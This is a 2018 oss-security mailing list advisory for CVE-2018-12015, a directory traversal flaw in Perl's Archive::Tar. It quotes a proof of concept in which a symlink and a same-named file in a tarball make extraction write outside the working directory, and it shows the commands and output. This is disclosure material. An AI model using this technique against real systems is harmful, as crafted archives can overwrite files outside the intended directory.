Date: Thu, 7 Jun 2018 20:41:25 +0200 From: Salvatore Bonaccorso <carnil@...ian.org> To: OSS Security Mailinglist <oss-security@...ts.openwall.com> Subject: Perl: CVE-2018-12015: Archive::Tar: directory traversal vulnerability Hi The following dirctory traversal vulnerability was reporte to the Debian bugtracker at https://bugs.debian.org/900834 , which got assigned CVE-2018-12015 by MITRE (requested via the http://cveform.mitre.org/): > By default, the Archive::Tar module doesn't allow extracting files > outside the current working directory. However, you can bypass this > secure extraction mode easily by putting a symlink and a regular file > with the same name into the tarball. > > I've attached proof of concept tarball, which makes Archive::Tar create > /tmp/moo, regardless of what the current working directory is: > > $ tar -tvvf traversal.tar.gz > lrwxrwxrwx root/root 0 2018-06-05 18:55 moo -> /tmp/moo > -rw-r--r-- root/root 4 2018-06-05 18:55 moo > > $ pwd > /home/jwilk > > $ ls /tmp/moo > ls: cannot access '/tmp/moo': No such file or directory > > $ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")' > > $ ls /tmp/moo > /tmp/moo The mentioned proof of concept tarball is attached to the Debian bug at https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=900834;filename=traversal.tar.gz;msg=3 . Regards, Salvatore
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ